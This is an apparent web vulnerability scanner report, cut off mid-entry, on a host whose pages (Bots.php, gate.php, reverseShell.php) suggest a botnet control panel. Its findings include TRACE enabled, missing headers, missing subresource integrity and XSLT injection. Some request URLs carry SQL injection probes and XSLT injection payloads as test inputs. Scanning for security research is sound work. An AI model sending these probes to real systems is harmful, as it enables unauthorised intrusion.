URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method TRACE
Parameter
Attack
Evidence S19UwCgu7Mr0k4YnilTm4OppshKHU5VJTFHGEVqQ
Request Header - size: 259 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 237 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method TRACE
Parameter
Attack
Evidence sY5pFoRk0sa5ZAh40ycdmQSLrvSrRjD6yRj5rsJ9
Request Header - size: 433 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 411 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method TRACE
Parameter
Attack
Evidence zZcAsiirSXlVb8NLVgShbWCXUwzVuCussEXuZXU0
Request Header - size: 686 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 664 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method TRACE
Parameter
Attack
Evidence KEJ81tp5GME5lfgQiq5qwDsRYhplVT26plhRG1su
Request Header - size: 519 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 497 bytes.
URL http://142.202.242.172/xampp/
Method TRACE
Parameter
Attack
Evidence 7nm2yAFkrxrd6VV8Jd6mtN3dSD8VI3oNX9iEXamB
Request Header - size: 261 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 239 bytes.
URL http://142.202.242.172/xampp/
Method TRACE
Parameter
Attack
Evidence FDyue4q9h5tyCY5JMCWwHqspRpSy3lH6A1zcVObm
Request Header - size: 223 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 201 bytes.
URL http://142.202.242.172/xampp/
Method TRACE
Parameter
Attack
Evidence JEwMPGWAXW2IE5GZlKcJ1RhqQ3qCKK5sQEm3Lue5
Request Header - size: 223 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 201 bytes.
URL http://142.202.242.172/xampp/
Method TRACE
Parameter
Attack
Evidence LBrokDjPF0IszhEGAXDeXDN6XQfKwBv9yprRBIS5
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 235 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method TRACE
Parameter
Attack
Evidence bD0UyfBfsngNxWzghbP7PWI961wxOcd85lsCC898
Request Header - size: 317 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 295 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method TRACE
Parameter
Attack
Evidence a4v4RE18hWMMDo3tEL8Fr4BgGs7To8MqVbJq8lnR
Request Header - size: 317 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 295 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method TRACE
Parameter
Attack
Evidence dGdkh03auMzlxZXcvLVFSsCrdBeLWcdmqqcWoAtw
Request Header - size: 317 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 295 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method TRACE
Parameter
Attack
Evidence LnCFLO7PLPLgxCOy4xxKbkkWsflWJEM05QiSFOTA
Request Header - size: 317 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 295 bytes.
Instances 50
Solution
Disable insecure methods such as TRACK, TRACE, and CONNECT on the web server, and ensure that the underlying service implementation does not support insecure methods.
Reference https://cwe.mitre.org/data/definitions/205.html
Tags OWASP_2021_A05
WSTG-v42-CONF-06
OWASP_2017_A06
CWE Id 200
WASC Id 45
Plugin Id 90028
Medium
Missing Anti-clickjacking Header
Description
The response does not include either Content-Security-Policy with 'frame-ancestors' directive or X-Frame-Options to protect against 'ClickJacking' attacks.
URL http://142.202.242.172
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 148 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 149 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=A
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=D
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=A
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=D
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=A
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=D
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=A
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
Instances 27
Solution
Modern Web browsers support the Content-Security-Policy and X-Frame-Options HTTP headers. Ensure one of them is set on all web pages returned by your site/app.

If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
Reference https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
Tags OWASP_2021_A05
WSTG-v42-CLNT-09
OWASP_2017_A06
CWE Id 1021
WASC Id 15
Plugin Id 10020
Medium
Relative Path Confusion
Description
The web server is configured to serve responses to ambiguous URLs in a manner that is likely to lead to confusion about the correct "relative path" for the URL. Resources (CSS, images, etc.) are also specified in the page response using relative, rather than absolute URLs. In an attack, if the web browser parses the "cross-content" response in a permissive manner, or can be tricked into permissively parsing the "cross-content" response, using techniques such as framing, then the web browser may be fooled into interpreting HTML as CSS (or other content types), leading to an XSS vulnerability.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Evidence <img src="Capture.PNG" alt="Logo">
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
Instances 1
Solution
Web servers and frameworks should be updated and configured so that they do not serve responses to ambiguous URLs in a way that allows the relative path of such URLs to be misinterpreted by components on either the client side or the server side.

Within the application, the correct use of the "<base>" HTML tag in the HTTP response will unambiguously specify the base URL for all relative URLs in the document.

Use the "Content-Type" HTTP response header to make it harder for the attacker to force the web browser to mis-interpret the content type of the response.

Use the "X-Content-Type-Options: nosniff" HTTP response header to prevent the web browser from "sniffing" the content type of the response.

Use a modern DOCTYPE such as "<!doctype html>" to prevent the page from being rendered in the web browser using "Quirks Mode", since this results in the content type being ignored by the web browser.

Specify the "X-Frame-Options" HTTP response header to prevent Quirks Mode from being enabled in the web browser using framing attacks.
Reference https://arxiv.org/abs/1811.00917
https://hsivonen.fi/doctype/
https://www.w3schools.com/tags/tag_base.asp
Tags OWASP_2021_A05
OWASP_2017_A06
CWE Id 20
WASC Id 20
Plugin Id 10051
Medium
Sub Resource Integrity Attribute Missing
Description
The integrity attribute is missing on a script or link tag served by an external server. The integrity attribute prevents an attacker who has gained access to that server from injecting malicious content.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter
Attack
Evidence <link href="https://cdn.jsdelivr.net/npm/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter
Attack
Evidence <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet">
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence <link href="https://cdn.jsdelivr.net/npm/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet">
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence <script src="https://cdn.jsdelivr.net/npm/chart.js"></script>
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet">
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script>
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet">
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script>
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet">
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script>
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence <link href="https://cdn.jsdelivr.net/npm/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet">
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter
Attack
Evidence <link href="https://cdn.jsdelivr.net/npm/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter
Attack
Evidence <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet">
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence <link href="https://cdn.jsdelivr.net/npm/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet">
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
Instances 26
Solution
Provide a valid integrity attribute to the tag.
Reference https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity
Tags OWASP_2021_A05
OWASP_2017_A06
CWE Id 345
WASC Id 15
Plugin Id 90003
Medium
XSLT Injection
Description
Injection using XSL transformations may be possible, and may allow an attacker to read system information, read and write files, or execute arbitrary code.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/Bots.php?id=54
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 748 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/dashboard.php?id=54
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 857 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/gate.php?bot=DESKTOP-95IQEEV
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 659 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 271 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 277 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi%20OR%201=1
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 288 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi%25'%20%20--
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 475 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi%25'%20%20--%20/Sound%20Effects
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
